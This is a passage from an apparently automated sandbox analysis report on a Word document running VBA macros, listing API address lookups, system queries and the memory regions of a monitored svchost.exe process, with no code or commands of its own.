| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
3 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9a83b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef9a7a13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9a81618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef9a7f088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee38d72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee38460b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee37f1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3845f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee37ef000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee37de860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee37d3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee37e2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee37d7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee37d7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee37d8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee3913260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee3913280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee37e1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee3846370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee3834590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee37d55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee37e0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee37d3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee37d6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee37d3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee37de6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee37ddf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee37d7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee37dfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee37d8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee38d2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee37e42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee37d3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee37dab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee37da7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee37d1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee37de830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee37d13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee37d6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee37d1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee37d3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee38d71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee38a6d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee39198e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee3919830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feff381320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feff38f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feff3dcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feff411760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff4120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feff3ac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feff3decd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feff3de840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feff3ef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feff3e4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feff3e9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feff3b6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff38a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feff3ef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x774f94f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x774f5f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x774f2b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x774eab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x774f5c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x774ea730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x774ea5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff382270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff40dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff385c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff386330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff3a66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff384710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff3848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff3bb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff3bb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff3c2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff3a58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff3a5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff3baf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff3da0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff412160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff3a5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff3a5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff3a5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff3a5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff3860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff383e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff3d9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff409b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff409aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff409990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff409890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff409770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff3eb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff3eb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff4048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff409470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff4096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff402fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff409cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff408ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff409c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff408e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff403690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff4092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff402e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff403f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff4091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff3e7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff3e7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff3e7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff3e7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff409600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff3e76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff4083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff3b3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff3bd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff3bd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff39caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff3a8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee37dfcd0 |
|
1 | |
| Get Address | Unknown module name | function = 587, address_out = 0x7fee42c2a2c |
|
1 | |
| Get Address | Unknown module name | function = 575, address_out = 0x7fee411b100 |
|
1 | |
| Get Address | Unknown module name | function = 585, address_out = 0x7fee42c2060 |
|
1 | |
| Get Address | Unknown module name | function = 614, address_out = 0x7fee42c3304 |
|
1 | |
| Get Address | Unknown module name | function = 583, address_out = 0x7fee42c2400 |
|
1 | |
| Get Address | Unknown module name | function = 626, address_out = 0x7fee42f2a80 |
|
1 | |
| Get Address | Unknown module name | function = DuplicateTokenEx, address_out = 0x7fefed9d310 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (28)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 46, y_out = 408 |
|
2 | |
| Get Cursor | x_out = 386, y_out = 108 |
|
1 | |
| Get Time | type = System Time, time = 2019-02-21 17:25:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 108888 |
|
1 | |
| Get Time | type = Local Time, time = 2019-02-21 17:25:36 (Local Time) |
|
13 | |
| Get Time | type = System Time, time = 2019-02-21 17:25:37 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 111509 |
|
1 | |
| Get Time | type = Local Time, time = 2019-02-21 17:26:48 (Local Time) |
|
2 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:51, Reason: RPC Server |
| Unmonitor | End Time: 00:04:55, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0x1d4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
A20
0x
554
0x
568
0x
420
0x
7E4
0x
7DC
0x
7D8
0x
784
0x
75C
0x
744
0x
738
0x
728
0x
724
0x
71C
0x
700
0x
6FC
0x
6F4
0x
6A8
0x
4C4
0x
488
0x
47C
0x
478
0x
458
0x
444
0x
30C
0x
294
0x
1E0
0x
3F8
0x
3EC
0x
3E0
0x
388
0x
384
0x
380
0x
37C
0x
374
0x
36C
0x
A4C
0x
A50
0x
AA8
0x
AAC
0x
AB0
0x
AB4
0x
AB8
0x
ABC
0x
AC4
0x
AC8
0x
B54
0x
B5C
0x
BC0
0x
BC4
0x
BC8
0x
BCC
0x
BD0
0x
BD4
0x
BD8
0x
BDC
0x
BE0
0x
BEC
0x
628
0x
7D4
0x
8B4
0x
8BC
0x
780
0x
57C
0x
364
0x
1CC
0x
C0
0x
C4
0x
124
0x
960
0x
868
0x
884
0x
8D8
0x
1C8
0x
A38
0x
B24
0x
A4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00517fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x0076ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00b62fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b70fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00bb0000 | 0x00bb3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bc1fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00bd0000 | 0x00bfffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00c00000 | 0x00c03fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c90000 | 0x00c90000 | 0x00c90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0x00ca0000 | 0x00cbbfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00cc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01080000 | 0x0134efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x013dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x0146ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001480000 | 0x01480000 | 0x0148ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014a0000 | 0x014a0000 | 0x0151ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x015bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015f0000 | 0x015f0000 | 0x0166ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001680000 | 0x01680000 | 0x016fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001750000 | 0x01750000 | 0x017cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001800000 | 0x01800000 | 0x0187ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000018b0000 | 0x018b0000 | 0x0192ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001980000 | 0x01980000 | 0x019fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a20000 | 0x01a20000 | 0x01a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001aa0000 | 0x01aa0000 | 0x01b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01caffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01cb0000 | 0x01d15fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x021c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x022cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x0234ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x023fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x0255ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002620000 | 0x02620000 | 0x0271ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e60000 | 0x02e60000 | 0x02f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x0313ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003140000 | 0x03140000 | 0x031bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031c0000 | 0x031c0000 | 0x0323ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x0335ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003360000 | 0x03360000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000035d0000 | 0x035d0000 | 0x0364ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000036b0000 | 0x036b0000 | 0x0372ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003940000 | 0x03940000 | 0x03b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ca0000 | 0x03ca0000 | 0x03d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d80000 | 0x03d80000 | 0x03dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e60000 | 0x03e60000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f60000 | 0x03f60000 | 0x03fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004070000 | 0x04070000 | 0x040effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x0434ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x045bffff | Private Memory | rw |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| svchost.exe | 0xffaa0000 | 0xffaaafff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef5270000 | 0x7fef527bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7fef53d0000 | 0x7fef53d7fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpipcfg.dll | 0x7fef53e0000 | 0x7fef5421fff | Memory Mapped File | rwx |
|
|
|
- |
| mprapi.dll | 0x7fef5430000 | 0x7fef5469fff | Memory Mapped File | rwx |
|
|
|
- |
| rascfg.dll | 0x7fef5470000 | 0x7fef5489fff | Memory Mapped File | rwx |
|
|
|
- |
| ndiscapcfg.dll | 0x7fef5490000 | 0x7fef549efff | Memory Mapped File | rwx |
|
|
|
- |
| hnetcfg.dll | 0x7fef54a0000 | 0x7fef550afff | Memory Mapped File | rwx |
|
|
|
- |
| resutils.dll | 0x7fef5510000 | 0x7fef5528fff | Memory Mapped File | rwx |
|
|
|
- |
| clusapi.dll | 0x7fef5530000 | 0x7fef557ffff | Memory Mapped File | rwx |
|
|
|
- |
| wbemess.dll | 0x7fef55b0000 | 0x7fef562dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5630000 | 0x7fef5645fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprvsd.dll | 0x7fef5650000 | 0x7fef570bfff | Memory Mapped File | rwx |
|
|
|
- |
| repdrvfs.dll | 0x7fef5710000 | 0x7fef5782fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5790000 | 0x7fef57b5fff | Memory Mapped File | rwx |
|
|
|
- |
| nci.dll | 0x7fef57c0000 | 0x7fef57d9fff | Memory Mapped File | rwx |
|
|
|
- |
| netcfgx.dll | 0x7fef57e0000 | 0x7fef5863fff | Memory Mapped File | rwx |
|
|
|
- |
| browser.dll | 0x7fef5870000 | 0x7fef5894fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcore.dll | 0x7fef58a0000 | 0x7fef59cefff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x7fef59d0000 | 0x7fef5a16fff | Memory Mapped File | rwx |
|
|
|
- |
| sqmapi.dll | 0x7fef5a20000 | 0x7fef5a61fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpsvc.dll | 0x7fef5a70000 | 0x7fef5b01fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fef5e10000 | 0x7fef5e95fff | Memory Mapped File | rwx |
|
|
|
- |
| wmisvc.dll | 0x7fef5ea0000 | 0x7fef5edffff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef60c0000 | 0x7fef60c8fff | Memory Mapped File | rwx |
|
|
|
- |
| vsstrace.dll | 0x7fef65d0000 | 0x7fef65e6fff | Memory Mapped File | rwx |
|
|
|
- |
| vssapi.dll | 0x7fef65f0000 | 0x7fef679ffff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef67d0000 | 0x7fef6843fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7fef8830000 | 0x7fef891dfff | Memory Mapped File | rwx |
|
|
|
- |
| taskcomp.dll | 0x7fef8df0000 | 0x7fef8e66fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fefa810000 | 0x7fefa819fff | Memory Mapped File | rwx |
|
|
|
- |
| schedsvc.dll | 0x7fefa820000 | 0x7fefa931fff | Memory Mapped File | rwx |
|
|
|
- |
| wiarpc.dll | 0x7fefac60000 | 0x7fefac6efff | Memory Mapped File | rwx |
|
|
|
- |
